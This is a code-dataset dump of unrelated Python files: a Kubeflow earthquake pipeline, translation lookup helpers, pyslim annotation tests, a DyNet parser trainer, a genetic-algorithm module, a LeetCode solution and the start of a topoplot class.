\"catalogs\",\n s3_url:str=\"minio-service:9000\", \n secure:bool=False):\n \n \n config = config_op()\n\n events = download_events_op(config.outputs[\"config_pkl\"])\n \n stations = download_stations_op(config.outputs[\"config_pkl\"])\n\n with kfp.dsl.ParallelFor(config.outputs[\"output\"]) as i:\n \n vop_ = dsl.VolumeOp(name=\"Create volume\",\n resource_name=\"data_volume\", \n size=\"10Gi\", \n modes=dsl.VOLUME_MODE_RWO)\n \n download_op_ = download_waveform_op(i, \n config.outputs[\"index_pkl\"], \n config.outputs[\"config_pkl\"], \n config.outputs[\"datetime_pkl\"], \n stations.outputs[\"station_pkl\"],\n data_path = data_path\n ).add_pvolumes({data_path: vop_.volume})\n\n phasenet_op_ = phasenet_op(download_op_.outputs[\"Output\"], \n download_op_.outputs[\"fname_csv\"], \n stations.outputs[\"station_csv\"]\n ).add_pvolumes({data_path: download_op_.pvolume})\n# phasenet_op_.execution_options.caching_strategy.max_cache_staleness = \"P0D\"\n\n gmma_op_ = gmma_op(i,\n config.outputs[\"index_pkl\"],\n config.outputs[\"config_pkl\"],\n phasenet_op_.outputs[\"picks\"],\n stations.outputs[\"station_csv\"],\n bucket_name = \"catalogs\",\n s3_url = s3_url,\n secure = secure\n ).add_pvolumes({data_path: phasenet_op_.pvolume})\n\n combine_op_ = combine_op(bucket_name = \"catalogs\", s3_url=s3_url, secure=secure).after(gmma_op_)\n combine_op_.execution_options.caching_strategy.max_cache_staleness = \"P0D\"\n\n\n# In[58]:\n\n\n# client = kfp.Client(host='553ab00ece5a86e5-dot-us-west1.pipelines.googleusercontent.com')\n\n\n# In[71]:\n\n\nexperiment_name = 'QuakeFlow'\npipeline_func = quakeflow_pipeline\nrun_name = pipeline_func.__name__ + '_run'\n\narguments = {\"data_path\": \"/tmp/\",\n \"bucket_catalog\": \"catalogs\",\n \"s3_url\": \"minio-service:9000\",\n \"secure\": False\n }\n\n# kfp.compiler.Compiler().compile(pipeline_func, '{}.zip'.format(experiment_name))\n# results = client.create_run_from_pipeline_func(pipeline_func, \n# experiment_name=experiment_name, \n# run_name=run_name, \n# arguments=arguments)\n\n","sub_path":"notebooks/Quakeflow_Pipeline.py","file_name":"Quakeflow_Pipeline.py","file_ext":"py","file_size_in_byte":32137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"145428597","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport os\nimport json\nimport 
collections\n# from pathInfo import xmlFilename2Info (cannot use because of circular import)\nimport pathInfo\n\n# See setTranslationData.py\nwith open(os.path.join(os.path.dirname(__file__), 'json/translationInfo.json'), 'r') as f:\n d = json.JSONDecoder(object_pairs_hook = collections.OrderedDict)\n translationInfo = d.decode(f.read())\n\n\ndef isValidTranslation(xmlFilename, translationLocale, translator):\n if translationLocale in translationInfo:\n if xmlFilename in translationInfo[translationLocale]['canon']:\n for localeXmlTranslation in translationInfo[translationLocale]['canon'][xmlFilename]:\n if translationInfo[translationLocale]['source'][ localeXmlTranslation['source'] ][0] == translator.decode('utf-8'):\n return True\n\n return False\n\n\ndef getTranslatorSource(xmlFilename, translationLocale, translator):\n if xmlFilename in translationInfo[translationLocale]['canon']:\n for localeXmlTranslation in translationInfo[translationLocale]['canon'][xmlFilename]:\n if translationInfo[translationLocale]['source'][ localeXmlTranslation['source'] ][0] == translator.decode('utf-8'):\n return localeXmlTranslation['source']\n\n raise Exception('cannot find translator source %s %s %s' % (xmlFilename, translationLocale, translator))\n\n\ndef getTranslator(translationLocale, localeXmlTranslation):\n return translationInfo[translationLocale]['source'][ localeXmlTranslation['source'] ][0]\n\n\ndef getLocaleXmlTranslations(translationLocale, xmlFilename):\n localeXmlTranslations = []\n for localeXmlTranslation in translationInfo[translationLocale]['canon'][xmlFilename]:\n tmp = { 'source': localeXmlTranslation['source'],\n 'translator': getTranslator(translationLocale, localeXmlTranslation) }\n\n # retrieve additional information if available\n if 'excerpt' in localeXmlTranslation:\n tmp['excerpt'] = localeXmlTranslation['excerpt']\n if 'URL' in localeXmlTranslation:\n tmp['URL'] = localeXmlTranslation['URL']\n if 'copyrightURL' in localeXmlTranslation:\n tmp['copyrightURL'] = localeXmlTranslation['copyrightURL']\n\n localeXmlTranslations.append(tmp)\n\n return localeXmlTranslations\n\n\ndef getI18nLinksTemplateValues(xmlFilename):\n i18nLinksTmpValue = { 'localeTranslations': [] }\n for translationLocale in translationInfo:\n localeTranslation = { 'translationLocale': translationLocale }\n if xmlFilename in translationInfo[translationLocale]['canon']:\n localeTranslation['localeXmlTranslations'] = \\\n getLocaleXmlTranslations(translationLocale, xmlFilename)\n\n if 'localeXmlTranslations' in localeTranslation:\n i18nLinksTmpValue['localeTranslations'].append(localeTranslation)\n\n if len(i18nLinksTmpValue['localeTranslations']) > 0:\n i18nLinksTmpValue['xmlFilename'] = xmlFilename\n return i18nLinksTmpValue\n\n\ndef getAllLocalesTranslationsTemplateValues():\n localeTranslations = []\n for translationLocale in translationInfo:\n localeTranslation = { 'translationLocale': translationLocale }\n localeTranslation['translations'] = []\n for xmlFilename in translationInfo[translationLocale]['canon']:\n info = pathInfo.xmlFilename2Info(xmlFilename)\n translation = { 'xmlFilename': xmlFilename,\n 'path': info['path'],\n 'translatedCanonNames': info['translatedCanonNames'],\n 'canonNames': info['canonNames'] }\n translation['localeXmlTranslations'] = \\\n getLocaleXmlTranslations(translationLocale, xmlFilename)\n localeTranslation['translations'].append(translation)\n\n if len(localeTranslation['translations']) > 0:\n localeTranslations.append(localeTranslation)\n\n return localeTranslations\n\n\ndef 
getXmlLocaleTranslationInfo(action, translationLocale, translator):\n trInfo = { 'isExcerpt': None,\n 'translationURL': None,\n 'translationCopyrightURL': None }\n\n xmlFilename = os.path.basename(action)\n localeXmlTranslations = translationInfo[translationLocale]['canon'][xmlFilename]\n for localeXmlTranslation in localeXmlTranslations:\n if translator.decode('utf-8') == translationInfo[translationLocale]['source'][ localeXmlTranslation['source'] ][0]:\n if 'excerpt' in localeXmlTranslation:\n trInfo['isExcerpt'] = True\n if 'copyrightURL' in localeXmlTranslation:\n trInfo['translationCopyrightURL'] = localeXmlTranslation['copyrightURL']\n if 'URL' in localeXmlTranslation:\n trInfo['translationURL'] = localeXmlTranslation['URL']\n\n return trInfo\n","sub_path":"tipitaka/pylib/translationInfo.py","file_name":"translationInfo.py","file_ext":"py","file_size_in_byte":4587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"341306123","text":"\"\"\"\nTest cases for the metadata reading/writing of pyslim.\n\"\"\"\nimport random\nimport json\n\nimport msprime\nimport tskit\nimport pytest\nimport numpy as np\n\nimport pyslim\nimport tests\nfrom .recipe_specs import restarted_recipe_eq\n\nclass TestAnnotate(tests.PyslimTestCase):\n '''\n Tests for tools to annotate existing msprime-derived tree sequences.\n '''\n\n def verify_annotated_tables(self, ts1, ts2):\n '''\n Verify that the tables returned after annotation are equal, up to the\n expected forgetting of metadata.\n '''\n tables1 = ts1.dump_tables()\n tables2 = ts2.dump_tables()\n # compare nodes\n assert np.array_equal(tables1.nodes.flags, tables2.nodes.flags)\n assert np.array_equal(tables1.nodes.time, tables2.nodes.time)\n assert np.array_equal(tables1.nodes.population, tables2.nodes.population)\n # compare edges\n assert tables1.edges == tables2.edges\n # compare sites\n assert np.array_equal(tables1.sites.position, tables2.sites.position)\n assert np.array_equal(tables1.sites.ancestral_state, tables2.sites.ancestral_state)\n assert np.array_equal(tables1.sites.ancestral_state_offset,\n tables2.sites.ancestral_state_offset)\n # compare mutations\n assert np.array_equal(tables1.mutations.site, tables2.mutations.site)\n assert np.array_equal(tables1.mutations.node, tables2.mutations.node)\n assert np.array_equal(tables1.mutations.derived_state, tables2.mutations.derived_state)\n assert np.array_equal(tables1.mutations.derived_state_offset,\n tables2.mutations.derived_state_offset)\n\n def verify_annotated_trees(self, ts1, ts2):\n '''\n Verify the *trees* returned before and after annotation are equal.\n '''\n assert ts1.num_trees == ts2.num_trees\n for t1, t2 in zip(ts1.trees(), ts2.trees()):\n assert t1.length == t2.length\n assert t1.get_parent_dict() == t2.get_parent_dict()\n assert t1.total_branch_length == t2.total_branch_length\n\n def verify_defaults(self, ts):\n '''\n Verify the default values have been entered into metadata.\n '''\n for m in ts.mutations():\n md = m.metadata\n assert md[\"mutation_type\"] == 1\n assert md[\"selection_coeff\"] == 0.0\n assert md[\"population\"] == tskit.NULL\n assert md[\"slim_time\"] == 0\n for n in ts.nodes():\n md = n.metadata\n if not n.is_sample():\n assert md is None\n else:\n assert md[\"is_null\"] is False\n assert md[\"genome_type\"] == pyslim.GENOME_TYPE_AUTOSOME\n for ind in ts.individuals():\n md = ind.metadata\n assert np.array_equal(ind.location, [0, 0, 0])\n assert ind.flags == pyslim.INDIVIDUAL_ALIVE\n assert md[\"sex\"] == 
pyslim.INDIVIDUAL_TYPE_HERMAPHRODITE\n assert md[\"flags\"] == 0\n for pop in ts.populations():\n md = pop.metadata\n assert md[\"selfing_fraction\"] == 0.0\n assert md[\"female_cloning_fraction\"] == 0.0\n assert md[\"male_cloning_fraction\"] == 0.0\n assert md[\"sex_ratio\"] == 0.0\n assert md[\"bounds_x0\"] == 0.0\n assert md[\"bounds_x1\"] == 0.0\n assert md[\"bounds_y0\"] == 0.0\n assert md[\"bounds_y1\"] == 0.0\n assert md[\"bounds_z0\"] == 0.0\n assert md[\"bounds_z1\"] == 0.0\n assert len(md[\"migration_records\"]) == 0\n\n def verify_provenance(self, ts):\n for u in ts.provenances():\n tskit.validate_provenance(json.loads(u.record))\n\n def verify_slim_restart_equality(self, in_ts, out_ts):\n \"\"\"\n Check for equality, in everything but the last provenance.\n \"\"\"\n assert in_ts.num_provenances + 1 == out_ts.num_provenances\n in_tables = in_ts.dump_tables()\n in_tables.sort()\n out_tables = out_ts.dump_tables()\n out_tables.sort()\n self.assertTableCollectionsEqual(in_tables, out_tables, skip_provenance=-1)\n\n def test_annotate_errors(self, helper_functions):\n for ts in helper_functions.get_msprime_examples():\n with pytest.raises(ValueError):\n _ = pyslim.annotate_defaults(ts, model_type=\"WF\",\n slim_generation=0)\n with pytest.raises(ValueError):\n _ = pyslim.annotate_defaults(ts, model_type=\"WF\",\n slim_generation=4.4)\n with pytest.raises(ValueError):\n _ = pyslim.annotate_defaults(ts, model_type=\"foo\",\n slim_generation=4)\n with pytest.raises(ValueError):\n _ = pyslim.annotate_defaults(ts, model_type=[],\n slim_generation=4)\n # odd number of samples\n ts = msprime.simulate(3)\n with pytest.raises(ValueError) as except_info:\n _ = pyslim.annotate_defaults(ts, model_type=\"WF\",\n slim_generation=1)\n assert \"diploid\" in str(except_info)\n # inconsistent populations for diploids\n ts = msprime.simulate(\n population_configurations=[\n msprime.PopulationConfiguration(sample_size=3),\n msprime.PopulationConfiguration(sample_size=1)],\n migration_matrix=[[0.0, 1.0], [1.0, 0.0]]\n )\n with pytest.raises(ValueError) as except_info:\n _ = pyslim.annotate_defaults(ts, model_type=\"WF\",\n slim_generation=1)\n assert \"more than one population\" in str(except_info)\n # inconsistent times for diploids\n samples = [\n msprime.Sample(population=0, time=0),\n msprime.Sample(population=0, time=0),\n msprime.Sample(population=0, time=0),\n msprime.Sample(population=0, time=1),\n ]\n ts = msprime.simulate(samples=samples)\n with pytest.raises(ValueError) as except_info:\n _ = pyslim.annotate_defaults(ts, model_type=\"WF\",\n slim_generation=1)\n assert \"more than one time\" in str(except_info)\n\n def test_basic_annotation(self, helper_functions, tmp_path):\n for ts in helper_functions.get_msprime_examples():\n slim_gen = 4\n slim_ts = pyslim.annotate_defaults(ts, model_type=\"WF\",\n slim_generation=slim_gen)\n assert slim_ts.metadata['SLiM']['model_type'] == 'WF'\n assert slim_ts.metadata['SLiM']['generation'] == slim_gen\n assert slim_ts.metadata['SLiM']['file_version'] == pyslim.slim_file_version\n self.verify_annotated_tables(ts, slim_ts)\n self.verify_annotated_trees(ts, slim_ts)\n self.verify_haplotype_equality(ts, slim_ts)\n self.verify_defaults(slim_ts)\n self.verify_provenance(slim_ts)\n # try loading this into SLiM\n loaded_ts = helper_functions.run_msprime_restart(slim_ts, tmp_path, WF=True)\n self.verify_annotated_tables(loaded_ts, slim_ts)\n self.verify_annotated_trees(loaded_ts, slim_ts)\n self.verify_haplotype_equality(loaded_ts, slim_ts)\n\n def 
test_annotate_individuals(self, helper_functions, tmp_path):\n for ts in helper_functions.get_msprime_examples():\n slim_ts = pyslim.annotate_defaults(ts, model_type=\"nonWF\", slim_generation=1)\n tables = slim_ts.dump_tables()\n top_md = tables.metadata\n top_md['SLiM']['separate_sexes'] = True\n tables.metadata = top_md\n metadata = [ind.metadata for ind in tables.individuals]\n sexes = [random.choice([pyslim.INDIVIDUAL_TYPE_FEMALE, pyslim.INDIVIDUAL_TYPE_MALE])\n for _ in metadata]\n for j in range(len(metadata)):\n metadata[j][\"sex\"] = sexes[j]\n ims = tables.individuals.metadata_schema\n tables.individuals.packset_metadata(\n [ims.validate_and_encode_row(r) for r in metadata])\n pop_metadata = [p.metadata for p in tables.populations]\n for j, md in enumerate(pop_metadata):\n # nonWF models always have this\n md['sex_ratio'] = 0.0\n pms = tables.populations.metadata_schema\n tables.populations.packset_metadata(\n [pms.validate_and_encode_row(r) for r in pop_metadata])\n new_ts = pyslim.load_tables(tables)\n for j, ind in enumerate(new_ts.individuals()):\n md = ind.metadata\n assert md[\"sex\"] == sexes[j]\n self.verify_annotated_tables(new_ts, slim_ts)\n self.verify_annotated_trees(new_ts, slim_ts)\n self.verify_haplotype_equality(new_ts, slim_ts)\n # try loading this into SLiM\n loaded_ts = helper_functions.run_msprime_restart(new_ts, tmp_path, sex=\"A\")\n self.verify_trees_equal(new_ts, loaded_ts)\n\n def test_annotate_XY(self, helper_functions, tmp_path):\n random.seed(8)\n for ts in helper_functions.get_msprime_examples():\n for genome_type in [\"X\", \"Y\"]:\n slim_ts = pyslim.annotate_defaults(ts, model_type=\"nonWF\", slim_generation=1)\n tables = slim_ts.dump_tables()\n top_md = tables.metadata\n top_md['SLiM']['separate_sexes'] = True\n tables.metadata = top_md\n metadata = [ind.metadata for ind in tables.individuals]\n sexes = [random.choice([pyslim.INDIVIDUAL_TYPE_FEMALE, pyslim.INDIVIDUAL_TYPE_MALE])\n for _ in metadata]\n for j in range(len(metadata)):\n metadata[j][\"sex\"] = sexes[j]\n ims = tables.individuals.metadata_schema\n tables.individuals.packset_metadata(\n [ims.validate_and_encode_row(r) for r in metadata])\n node_metadata = [n.metadata for n in tables.nodes]\n for j in range(slim_ts.num_individuals):\n nodes = slim_ts.individual(j).nodes\n node_metadata[nodes[0]][\"genome_type\"] = pyslim.GENOME_TYPE_X\n node_metadata[nodes[0]][\"is_null\"] = (genome_type != \"X\")\n if sexes[j] == pyslim.INDIVIDUAL_TYPE_MALE:\n node_metadata[nodes[1]][\"genome_type\"] = pyslim.GENOME_TYPE_Y\n node_metadata[nodes[1]][\"is_null\"] = (genome_type != \"Y\")\n else:\n node_metadata[nodes[1]][\"genome_type\"] = pyslim.GENOME_TYPE_X\n node_metadata[nodes[1]][\"is_null\"] = (genome_type != \"X\")\n nms = tables.nodes.metadata_schema\n tables.nodes.packset_metadata(\n [nms.validate_and_encode_row(r) for r in node_metadata])\n pop_metadata = [p.metadata for p in tables.populations]\n for j, md in enumerate(pop_metadata):\n # nonWF models always have this\n md['sex_ratio'] = 0.0\n pms = tables.populations.metadata_schema\n tables.populations.packset_metadata(\n [pms.validate_and_encode_row(r) for r in pop_metadata])\n new_ts = pyslim.load_tables(tables)\n self.verify_annotated_tables(new_ts, slim_ts)\n self.verify_annotated_trees(new_ts, slim_ts)\n self.verify_haplotype_equality(new_ts, slim_ts)\n # try loading this into SLiM\n loaded_ts = helper_functions.run_msprime_restart(\n new_ts, tmp_path, sex=genome_type)\n self.verify_trees_equal(new_ts, loaded_ts)\n # these are *not* equal 
but only due to re-ordering of nodes and individuals\n # ... and for some reason, .subset( ) or .simplify( ) do not produce equality\n # self.assertTableCollectionsEqual(new_ts, loaded_ts,\n # skip_provenance=-1, reordered_individuals=True)\n\n def test_annotate_nodes(self, helper_functions):\n for ts in helper_functions.get_msprime_examples():\n slim_ts = pyslim.annotate_defaults(ts, model_type=\"nonWF\", slim_generation=1)\n tables = slim_ts.dump_tables()\n metadata = [n.metadata for n in tables.nodes]\n gtypes = [random.choice([pyslim.GENOME_TYPE_X, pyslim.GENOME_TYPE_Y])\n for _ in metadata]\n for md, g in zip(metadata, gtypes):\n if md is not None:\n md[\"genome_type\"] = g\n nms = tables.nodes.metadata_schema\n tables.nodes.packset_metadata(\n [nms.validate_and_encode_row(r) for r in metadata])\n new_ts = pyslim.load_tables(tables)\n for x, g in zip(new_ts.nodes(), gtypes):\n if x.metadata is not None:\n assert x.metadata[\"genome_type\"] == g\n # not testing SLiM because needs annotation of indivs to make sense\n\n def test_annotate_mutations(self, helper_functions):\n for ts in helper_functions.get_msprime_examples():\n slim_ts = pyslim.annotate_defaults(ts, model_type=\"nonWF\", slim_generation=1)\n tables = slim_ts.dump_tables()\n metadata = [m.metadata for m in tables.mutations]\n selcoefs = [random.uniform(0, 1) for _ in metadata]\n for j in range(len(metadata)):\n metadata[j]['mutation_list'][0][\"selection_coeff\"] = selcoefs[j]\n ms = tables.mutations.metadata_schema\n tables.mutations.packset_metadata(\n [ms.validate_and_encode_row(r) for r in metadata])\n new_ts = pyslim.load_tables(tables)\n for j, x in enumerate(new_ts.mutations()):\n md = x.metadata\n assert md['mutation_list'][0][\"selection_coeff\"] == selcoefs[j]\n\n def test_dont_annotate_mutations(self, helper_functions):\n # Test the option to not overwrite mutation annotations\n for ts in helper_functions.get_msprime_examples():\n ts = msprime.mutate(ts, rate=5, random_seed=3)\n assert ts.num_mutations > 0\n tables = ts.dump_tables()\n pre_mutations = tables.mutations.copy()\n pyslim.annotate_defaults_tables(tables, model_type=\"WF\",\n slim_generation=1, annotate_mutations=False)\n # this is necessary because b'' actually is decoded to\n # an empty mutation_list by the schema\n pre_mutations.metadata_schema = tables.mutations.metadata_schema\n assert tables.mutations == pre_mutations\n\n @pytest.mark.parametrize(\n 'restart_name, recipe', restarted_recipe_eq(\"no_op\"), indirect=[\"recipe\"])\n def test_reload_recapitate(\n self, restart_name, recipe, helper_functions, tmp_path\n ):\n # Test the ability of SLiM to load our files after recapitation.\n ts = recipe[\"ts\"]\n # recapitate, reload\n in_ts = pyslim.recapitate(ts, recombination_rate=1e-2, ancestral_Ne=10, random_seed=25)\n # put it through SLiM (which just reads in and writes out)\n out_ts = helper_functions.run_slim_restart(in_ts, restart_name, tmp_path)\n # check for equality, in everything but the last provenance\n in_ts.dump(\"in_ts.trees\")\n out_ts.dump(\"out_ts.trees\")\n self.verify_slim_restart_equality(in_ts, out_ts)\n\n @pytest.mark.parametrize(\n 'restart_name, recipe', restarted_recipe_eq(\"no_op\"), indirect=[\"recipe\"])\n def test_reload_annotate(\n self, restart_name, recipe, helper_functions, tmp_path\n ):\n # Test the ability of SLiM to load our files after annotation.\n ts = recipe[\"ts\"]\n tables = ts.dump_tables()\n metadata = [m.metadata for m in tables.mutations]\n has_nucleotides = tables.metadata['SLiM']['nucleotide_based']\n 
if has_nucleotides:\n nucs = [random.choice([0, 1, 2, 3]) for _ in metadata]\n refseq = \"\".join(random.choices(pyslim.NUCLEOTIDES,\n k = int(ts.sequence_length)))\n for n, md in zip(nucs, metadata):\n for m in md['mutation_list']:\n m[\"nucleotide\"] = n\n else:\n refseq = None\n for md in metadata:\n for m in md['mutation_list']:\n m[\"selection_coeff\"] = random.random()\n ms = tables.mutations.metadata_schema\n tables.mutations.packset_metadata(\n [ms.validate_and_encode_row(r) for r in metadata])\n in_ts = pyslim.load_tables(tables, reference_sequence=refseq)\n # put it through SLiM (which just reads in and writes out)\n out_ts = helper_functions.run_slim_restart(in_ts, restart_name, tmp_path)\n # check for equality, in everything but the last provenance\n self.verify_slim_restart_equality(in_ts, out_ts)\n\n\nclass TestReload(tests.PyslimTestCase):\n '''\n Tests for basic things related to reloading with SLiM\n '''\n @pytest.mark.parametrize(\n 'restart_name, recipe', restarted_recipe_eq(\"no_op\"), indirect=[\"recipe\"])\n def test_load_without_provenance(\n self, restart_name, recipe, helper_functions, tmp_path\n ):\n in_ts = recipe[\"ts\"]\n # with 0.5, SLiM should read info from metadata, not provenances\n in_tables = in_ts.dump_tables()\n in_tables.provenances.clear()\n in_tables.sort()\n cleared_ts = pyslim.SlimTreeSequence(\n in_tables.tree_sequence(),\n reference_sequence=in_ts.reference_sequence\n )\n out_ts = helper_functions.run_slim_restart(cleared_ts, restart_name, tmp_path)\n out_tables = out_ts.dump_tables()\n out_tables.provenances.clear()\n out_tables.sort()\n in_tables.assert_equals(out_tables)\n\n @pytest.mark.parametrize(\n 'restart_name, recipe', restarted_recipe_eq(\"no_op\", \"nucleotides\"), indirect=[\"recipe\"])\n def test_reload_reference_sequence(\n self, restart_name, recipe, helper_functions, tmp_path\n ):\n in_ts = recipe[\"ts\"]\n out_ts = helper_functions.run_slim_restart(in_ts, restart_name, tmp_path)\n assert in_ts.metadata['SLiM']['nucleotide_based'] is True\n assert out_ts.metadata['SLiM']['nucleotide_based'] is True\n assert in_ts.reference_sequence == out_ts.reference_sequence\n","sub_path":"tests/test_annotation.py","file_name":"test_annotation.py","file_ext":"py","file_size_in_byte":18773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"122345967","text":"\n\n#calss header\nclass _ABUTMENT():\n\tdef __init__(self,): \n\t\tself.name = \"ABUTMENT\"\n\t\tself.definitions = [u'a structure that is built to support an arch (= a curved top on two supports, that holds the weight of something above it), or the end of a bridge', u'the process of supporting something using an abutment']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_abutment.py","file_name":"_abutment.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"461845550","text":"from pyramid.response import Response\n\ndef groupfinder(userid, request):\n user = request.user\n if user and user.is_admin:\n return ['admin']\n elif user:\n return ['user']\n\ndef notfound(request):\n return Response(HTML_404)\n\nHTML_404 = \"\"\"\n\t\n\t\t\n\t\t\t
    \n\t\t\tPAGE NOT FOUND\n\t\t\n\t\n\"\"\"\n","sub_path":"alchemist/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"470939519","text":"from __future__ import print_function\n\nimport dynet_config\ndynet_config.set(mem=1024,random_seed=12345)\n\nimport sys\nimport random\nimport dynet as dy\nimport numpy as np\nfrom models import MLPParser, FIELDS\nfrom utils import DepTree, map_to_instances, read_conllu, read_index\n\ndef arc_loss(model, tree):\n h = model.transduce(tree.feats)\n scores = model.predict_arcs(h)\n loss = [hinge_loss(sc, tree.heads[dep]) for dep, sc in enumerate(scores)]\n return dy.esum(loss)\n\ndef label_loss(model, tree):\n h = model.transduce(tree.feats)\n scores = model.predict_labels(tree.heads, h)\n loss = [hinge_loss(sc, tree.labels[dep] - 1) for dep, sc in enumerate(scores)]\n return dy.esum(loss)\n\ndef hinge_loss(exprs, target, margin=1.0):\n scores = exprs.value()\n best_wrong = max([(i, sc) for i, sc in enumerate(scores) if i != target], key=lambda x: x[1])[0]\n if scores[target] < scores[best_wrong] + margin:\n return exprs[best_wrong] - exprs[target] + margin\n else:\n return dy.zeros(1)\n\ndef shuffled_stream(data):\n while True:\n random.shuffle(data)\n for d in data:\n yield d\n\ndef evaluate(model, validation_data):\n num_tokens = 0.\n correct_ua = correct_la = 0.\n\n model.disable_dropout()\n for i, gold in enumerate(validation_data):\n num_tokens += len(gold)\n parsed = model.parse(gold.feats)\n\n for n in range(len(gold)):\n if parsed.heads[n] == gold.heads[n]:\n correct_ua += 1.\n if parsed.labels[n] == gold.labels[n]:\n correct_la += 1.\n\n if (i % 100) == 0:\n print(\".\", end=\"\")\n sys.stdout.flush()\n model.enable_dropout()\n\n uas = correct_ua / num_tokens\n las = correct_la / num_tokens\n print(\"\\nUAS: {0:.4}, LAS: {1:.4}\".format(uas, las))\n\nif __name__ == \"__main__\":\n\n basename = \"../build/en\"\n index = read_index(basename)\n train_data = list(map_to_instances(read_conllu(\"../treebanks/train/en/en.conllu\"), index, FIELDS))\n\n pc = dy.ParameterCollection()\n model = MLPParser(pc, basename=\"../build/en\")\n model.enable_dropout()\n trainer = dy.AdamTrainer(pc)\n\n print(\"training sentences: {0}, tokens: {1}\".format(len(train_data), sum([len(tree) for tree in train_data])))\n\n batch_size = 50\n max_steps = 1000\n\n step = 0\n total_loss = 0\n batch_loss = []\n batch_tokens = 0\n\n dy.renew_cg()\n for tree in shuffled_stream(train_data):\n\n batch_loss.append(arc_loss(model, tree))\n batch_loss.append(label_loss(model, tree))\n\n batch_tokens += len(tree)\n if batch_tokens >= batch_size:\n loss = dy.esum(batch_loss) * (1.0 / batch_tokens)\n total_loss += loss.value()\n loss.backward()\n trainer.update()\n\n dy.renew_cg()\n batch_loss = []\n batch_tokens = 0\n step += 1\n\n if (step % 100) == 0:\n print(\".\", end=\"\")\n sys.stdout.flush()\n\n if (step % 1000) == 0:\n print(\"\\naverage loss: {0}\".format(total_loss / 1000))\n evaluate(model, train_data)\n total_loss = 0.0\n\n if step >= max_steps:\n break\n","sub_path":"src/dl4dp.py","file_name":"dl4dp.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"510607317","text":"from genetic.individuals import Individual\n\nimport heapq\nimport abc\nfrom typing import Sequence, List\nimport numpy as np\n\n\nclass 
AbstractEvolutionStrategy(metaclass=abc.ABCMeta):\n @abc.abstractmethod\n def crossover(self, individuals: Sequence[Individual], fitness: Sequence[float]) -> Sequence[Individual]:\n pass\n\n\nclass ElitismEvolution(AbstractEvolutionStrategy):\n def __init__(self, mutation_probability: float, elitism: int or bool):\n self.mutation_probability = mutation_probability\n self.elitism = int(elitism)\n\n @staticmethod\n def fitness2prob(fitness: Sequence[float]) -> Sequence[float]:\n probabilities = np.array(fitness)\n probabilities[np.isnan(probabilities)] = 0\n probabilities[probabilities < 0] = 0\n probabilities = probabilities / np.nansum(probabilities)\n return probabilities\n\n def get_elite(self, species: Sequence, fitness: Sequence[float]) -> List:\n if self.elitism == 0:\n return []\n\n best_species, _ = zip(*heapq.nlargest(self.elitism, zip(species, fitness), key=lambda x: x[1]))\n return list(best_species)\n\n def crossover(self, individuals: Sequence[Individual], fitness: Sequence[float]) -> Sequence[Individual]:\n number_of_species = len(individuals)\n\n probabilities = self.fitness2prob(fitness)\n\n new_generation = self.get_elite(individuals, probabilities)\n for i in range(number_of_species - len(new_generation)):\n new_specie = Individual.__add__(*np.random.choice(individuals, size=2, p=probabilities))\n\n new_specie.mutate(self.mutation_probability)\n\n new_generation.append(new_specie)\n\n return new_generation\n\n\nclass BasicEvolution(ElitismEvolution):\n def __init__(self, mutation_probability: float):\n super().__init__(mutation_probability, 0)\n","sub_path":"genetic/evolution_strategy.py","file_name":"evolution_strategy.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"422761874","text":"class Solution:\n def makeGood(self, s: str) -> str:\n stack = []\n for i in s:\n if stack and ((ord(stack[-1])-32) == ord(i) or (ord(stack[-1])+32) == ord(i)):\n stack.pop()\n else:\n stack.append(i)\n return ''.join(stack)\n\n\ns = \"leEeetcode\"\nres = Solution().makeGood(s)\nprint(res)","sub_path":"stack/1544_make_the_string_great/1544_make_the_string_great.py","file_name":"1544_make_the_string_great.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"510242136","text":"# Released under The MIT License (MIT)\n# http://opensource.org/licenses/MIT\n# Copyright (c) 2013 Martin Billinger\n\nimport numpy as np\nfrom scipy.interpolate import interp1d\n#noinspection PyPep8Naming\nimport matplotlib.pyplot as plot\n#noinspection PyPep8Naming\nimport matplotlib.path as path\n#noinspection PyPep8Naming\nimport matplotlib.patches as patches\nimport matplotlib.transforms as transforms\nfrom .projections import array_project_radial_to3d, project_radial_to2d\nfrom .geometry.euclidean import Vector\n\n\nclass Topoplot:\n \"\"\" Creates 2D scalp maps. 
